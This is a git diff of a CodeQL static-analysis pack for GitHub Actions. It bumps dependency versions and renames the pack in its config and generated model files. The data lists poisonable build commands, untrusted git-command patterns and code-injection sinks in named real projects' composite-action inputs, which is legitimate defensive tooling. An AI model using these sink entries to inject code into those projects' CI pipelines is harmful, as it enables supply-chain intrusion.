.../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 ++-- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- 
.../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- 
...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- 
.../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 ++-- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 ++-- .../ext/manual/8398a7_action-slack.model.yml | 2 
+- .../manual/AsasInnab_regex-action.model.yml | 2 +- .../ext/manual/MeilCli_regex-match.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- .../Steph0_dotenv-configserver.model.yml | 2 +- ...us_github-action-files-in-commit.model.yml | 2 +- .../manual/aarcangeli_load-dotenv.model.yml | 2 +- .../ab185508_file-type-finder.model.yml | 2 +- ...ons-ecosystem_action-regex-match.model.yml | 2 +- .../manual/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- .../manual/akefirad_loadenv-action.model.yml | 2 +- .../manual/akhileshns_heroku-deploy.model.yml | 4 ++-- ...bell_pull-request-comment-branch.model.yml | 2 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- .../ext/manual/anchore_sbom-action.model.yml | 2 +- .../ext/manual/anchore_scan-action.model.yml | 2 +- .../andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- .../ankitjain28may_list-files-in-pr.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- .../ext/manual/appleboy_ssh-action.model.yml | 2 +- ql/lib/ext/manual/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...aamMavridis_files-changed-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/manual/azure_cli.model.yml | 2 +- ql/lib/ext/manual/azure_powershell.model.yml | 2 +- .../ext/manual/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- .../manual/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 ++-- .../manual/bufbuild_buf-lint-action.model.yml | 4 ++-- .../bufbuild_buf-setup-action.model.yml | 2 +- .../c-py_action-dotenv-to-setenv.model.yml | 2 +- .../ext/manual/cachix_cachix-action.model.yml | 4 ++-- 
ql/lib/ext/manual/changesets_action.model.yml | 2 +- .../cloudflare_wrangler-action.model.yml | 2 +- .../cosq-network_dotenv-loader.model.yml | 2 +- .../manual/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- .../manual/cypress-io_github-action.model.yml | 2 +- .../dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- .../manual/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- .../devorbitus_yq-action-output.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- .../manual/docker_build-push-action.model.yml | 2 +- ...3d_action-extract-unique-matches.model.yml | 2 +- .../manual/eficode_resolve-pr-refs.model.yml | 2 +- ql/lib/ext/manual/endbug_latest-tag.model.yml | 2 +- .../manual/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- .../manual/gabrielbb_xvfb-action.model.yml | 2 +- .../manual/game-ci_unity-builder.model.yml | 2 +- .../game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- .../manual/getsentry_action-release.model.yml | 2 +- .../ext/manual/github_codeql-action.model.yml | 2 +- .../go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...tson_pull-request-comment-branch.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../gradle_gradle-build-action.model.yml | 2 
+- .../manual/haya14busa_action-cond.model.yml | 2 +- .../manual/hexlet_project-action.model.yml | 2 +- .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/manual/ilammy_setup-nasm.model.yml | 2 +- .../ext/manual/imjohnbo_issue-bot.model.yml | 2 +- .../ext/manual/iterative_setup-cml.model.yml | 2 +- .../ext/manual/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../jitterbit_get-changed-files.model.yml | 2 +- .../johnnymorganz_stylua-action.model.yml | 2 +- .../manual/jsdaniell_create-json.model.yml | 2 +- .../jsmith_changes-since-last-tag.model.yml | 2 +- .../jurplel_install-qt-action.model.yml | 2 +- .../ext/manual/jwalton_gh-ecr-push.model.yml | 4 ++-- .../kaisugi_action-regex-match.model.yml | 2 +- ...rpikpl_list-changed-files-action.model.yml | 2 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ql/lib/ext/manual/knu_changed-files.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- .../ext/manual/leafo_gh-actions-lua.model.yml | 2 +- .../leafo_gh-actions-luarocks.model.yml | 2 +- ...logs_gh-action-get-changed-files.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ...felipelaviola_parse-plain-dotenv.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- .../ext/manual/magefile_mage-action.model.yml | 2 +- .../manual/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- .../manual/marocchino_on_artifact.model.yml | 2 +- .../martinhaintz_ga-file-list.model.yml | 2 +- .../manual/mattdavis0351_actions.model.yml | 4 ++-- .../meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- .../manual/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/manual/mikefarah_yq.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/manual/msys2_setup-msys2.model.yml | 2 +- .../manual/mxschmitt_action-tmate.model.yml | 2 
+- .../manual/mymindstorm_setup-emsdk.model.yml | 4 ++-- .../nanasess_setup-chromedriver.model.yml | 2 +- .../ext/manual/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/manual/nick-fields_retry.model.yml | 2 +- .../manual/octokit_graphql-action.model.yml | 2 +- .../manual/octokit_request-action.model.yml | 2 +- .../ext/manual/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- ...ulschuberth_regex-extract-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- ...r-murray_issue-forms-body-parser.model.yml | 2 +- .../plasmicapp_plasmic-action.model.yml | 2 +- .../potiuk_get-workflow-origin.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/manual/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- .../ext/manual/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ql/lib/ext/manual/read-file-actions.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- .../ext/manual/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/manual/release-kit_regex.model.yml | 2 +- .../renovatebot_github-action.model.yml | 2 +- .../rishabh510_path-lister-action.model.yml | 2 +- .../roots_issue-closer-action.model.yml | 2 +- .../manual/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/manual/ruby_setup-ruby.model.yml | 4 ++-- ...ction-detect-and-tag-new-version.model.yml | 4 ++-- .../ext/manual/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- .../ext/manual/snow-actions_eclint.model.yml | 2 +- .../stackhawk_hawkscan-action.model.yml | 2 +- .../step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- .../the-coding-turtle_ga-file-list.model.yml | 2 +- 
ql/lib/ext/manual/tibdex_backport.model.yml | 2 +- .../tim-actions_get-pr-commits.model.yml | 2 +- .../manual/timheuer_base64-to-file.model.yml | 2 +- .../manual/tj-actions_branch-names.model.yml | 2 +- ...tmelliottjr_extract-regex-action.model.yml | 2 +- .../trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- .../manual/tzkhan_pr-update-action.model.yml | 2 +- .../manual/veracode_veracode-sca.model.yml | 2 +- .../w3f_action-find-old-files.model.yml | 2 +- .../wearerequired_lint-action.model.yml | 2 +- .../ext/manual/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 2 +- ...rted_pull-request-comment-branch.model.yml | 2 +- .../manual/yumemi-inc_changed-files.model.yml | 2 +- .../manual/zaproxy_action-baseline.model.yml | 2 +- .../manual/zaproxy_action-full-scan.model.yml | 2 +- ...zentered_issue-forms-body-parser.model.yml | 2 +- 792 files changed, 833 insertions(+), 823 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 56fced44da8..3214ce52287 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml 
+++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4d28fa778e0..930a4344e12 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 7d40620e913..e1bfca52ea7 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: externallyTriggerableEventsDataModel data: - ["discussion"] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b402..bca33af8dc5 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: @@ -13,7 +13,7 @@ extensions: - ["qcastel/github-actions-maven/actions/maven"] - ["sonarsource/sonarcloud-github-action"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableCommandsDataModel # source: https://boostsecurityio.github.io/lotp/ data: 
@@ -61,7 +61,7 @@ extensions: - ["yarn"] - ["webpack"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 1e54fa6eca3..cf3d6df8094 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedEventPropertiesDataModel data: # TITLE diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml index 653f9e31c98..c81c048e45e 100644 --- a/ql/lib/ext/config/untrusted_gh_command.yml +++ b/ql/lib/ext/config/untrusted_gh_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGhCommandDataModel data: # diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/ql/lib/ext/config/untrusted_git_command.yml index e862267027a..05fda3e1cd9 100644 --- a/ql/lib/ext/config/untrusted_git_command.yml +++ b/ql/lib/ext/config/untrusted_git_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml index eb452983bfc..1fe00ad733b 100644 --- a/ql/lib/ext/config/vulnerable_actions.yml +++ b/ql/lib/ext/config/vulnerable_actions.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: vulnerableActionsDataModel data: diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml index 88e266d8142..f02a6bc20aa 100644 
--- a/ql/lib/ext/config/workflow_runtime_data.yml +++ b/ql/lib/ext/config/workflow_runtime_data.yml @@ -1,9 +1,9 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: repositoryDataModel data: [] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: workflowDataModel data: [] diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index a098666dba0..ba6dbbe91e6 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 476c522f5ea..b3430655e01 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index ad369575c42..3c6e8718fb4 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index e68306a454c..fee02f3d3bd 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 923d267ac66..c102a42d3ea 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 9557cbbee80..77744b4ab47 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index eea604dc8dd..e9e6941e634 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 5ee8503193b..e0240360052 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 44795adc64a..cae561f7775 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index a1a7e28f572..18d893d4c53 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 792a00ea387..b40d68cc560 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 5ee9c5aefbe..9282d312fb8 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 8b438734d5d..f0636131cdb 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ 